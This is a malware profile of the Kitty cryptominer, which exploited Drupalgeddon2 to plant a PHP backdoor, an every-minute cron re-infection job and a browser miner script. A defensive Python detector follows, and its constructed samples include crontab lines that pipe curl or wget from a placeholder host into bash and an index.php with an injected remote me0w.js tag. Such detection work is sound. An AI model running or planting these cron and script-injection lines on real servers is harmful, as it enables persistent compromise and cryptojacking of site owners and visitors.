Kitty is a cryptocurrency-mining malware that uses “webminerpool”, an open source browser-based mining library, to mine the Monero cryptocurrency. It was first observed in May 2018 exploiting the well-known Drupalgeddon2 vulnerability (CVE-2018-7600), which allows unauthenticated remote code execution on Drupal web servers. Once the malware has a foothold on a server, it writes a PHP file to the server's disk that gives the threat actors a backdoor into the machine. It then installs a cron job that re-downloads and executes a bash script from a remote host every minute, so the attacker can re-infect the server even if the software is updated or the miner is removed. Finally, the XMRig Monero miner is installed and run on the system.

Along with mining on the infected server itself, Kitty also aims to infect visitors of the web application. To do so, the malware locates the site's index.php file and injects the malicious JavaScript file me0w.js into it. Once index.php has been modified, the browsers of users visiting the infected web server's sites are leveraged for cryptocurrency mining.
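As an added illustration (not code from the Imperva report or from this entry), the following Python checks look for the two traits described above on a suspect host: a cron job that fetches a remote script every minute and hands it to a shell, and a remote script tag injected into index.php. The crontab, the PHP file, the host 203.0.113.10 and the script name update.sh are constructed samples for the demo and are not indicators from the report; only the filename me0w.js comes from the entry.

```python
"""Detection helpers for the cron re-infection loop and the index.php injection.

Added example; the samples below are constructed, not observed artifacts.
"""
import re
from typing import Dict, List

# Constructed crontab: one benign entry, the every-minute download-and-run loop
# described above, a benign */5 job and a @reboot download (also worth flagging).
# Host and script names are placeholders, not indicators from the report.
SAMPLE_CRONTAB = """\
MAILTO=root
# nightly certificate renewal
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -s http://203.0.113.10/update.sh | bash
*/5 * * * * /usr/local/bin/backup.sh
@reboot wget -q -O /tmp/run.sh http://203.0.113.10/run.sh && bash /tmp/run.sh
"""

# Constructed index.php: a Drupal-style front controller with a script tag for a
# remote me0w.js appended after the closing ?> so PHP emits it to every visitor.
SAMPLE_INDEX_PHP = """\
<?php
use Drupal\\Core\\DrupalKernel;
use Symfony\\Component\\HttpFoundation\\Request;
$autoloader = require_once 'autoload.php';
$kernel = new DrupalKernel('prod', $autoloader);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
?>
<script src="http://203.0.113.10/me0w.js"></script>
"""

# curl/wget fetching an http(s) URL, and the fetched content reaching a shell.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(https?://\S+)", re.IGNORECASE)
SHELL_EXEC_RE = re.compile(r"(?:\||&&|;)\s*(?:ba)?sh\b", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def parse_cron_entries(crontab: str) -> List[Dict[str, str]]:
    """Split a crontab into schedule/command pairs, skipping blank lines,
    comments and environment assignments such as MAILTO=root."""
    entries = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue  # environment assignment, not a job
        if line.startswith("@"):  # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed line
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append({"schedule": schedule, "command": command})
    return entries


def find_suspicious_cron(crontab: str) -> List[Dict[str, object]]:
    """Flag jobs that download from a remote URL and run the result in a shell,
    and note whether they fire every minute (the re-infection loop)."""
    findings = []
    for entry in parse_cron_entries(crontab):
        cmd = entry["command"]
        m = DOWNLOAD_RE.search(cmd)
        if m and SHELL_EXEC_RE.search(cmd):
            findings.append({
                "schedule": entry["schedule"],
                "url": m.group(1),
                "every_minute": entry["schedule"] == "* * * * *",
            })
    return findings


def find_injected_scripts(php_source: str) -> List[Dict[str, object]]:
    """Return <script src=...> references found in a PHP file. A front
    controller like Drupal's index.php should contain none at all, so any hit
    is suspicious; remote sources and the me0w.js name are marked explicitly."""
    findings = []
    for m in SCRIPT_SRC_RE.finditer(php_source):
        src = m.group(1)
        findings.append({
            "src": src,
            "remote": bool(re.match(r"^(?:https?:)?//", src)),
            "known_miner_loader": src.rsplit("/", 1)[-1] == "me0w.js",
        })
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_cron(SAMPLE_CRONTAB):
        print("cron:", hit)
    for hit in find_injected_scripts(SAMPLE_INDEX_PHP):
        print("index.php:", hit)
```

On a real host the same functions would be run over the output of `crontab -l` for every user plus the files under /etc/cron.d, and over every index.php in the web root; a cron entry with a `* * * * *` schedule that pipes curl or wget into a shell is the strongest single signal of the persistence described above.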

Reporting and Technical Details

  • May 2018: Crypto Me0wing Attacks: Kitty Cashes in on Monero. (Imperva)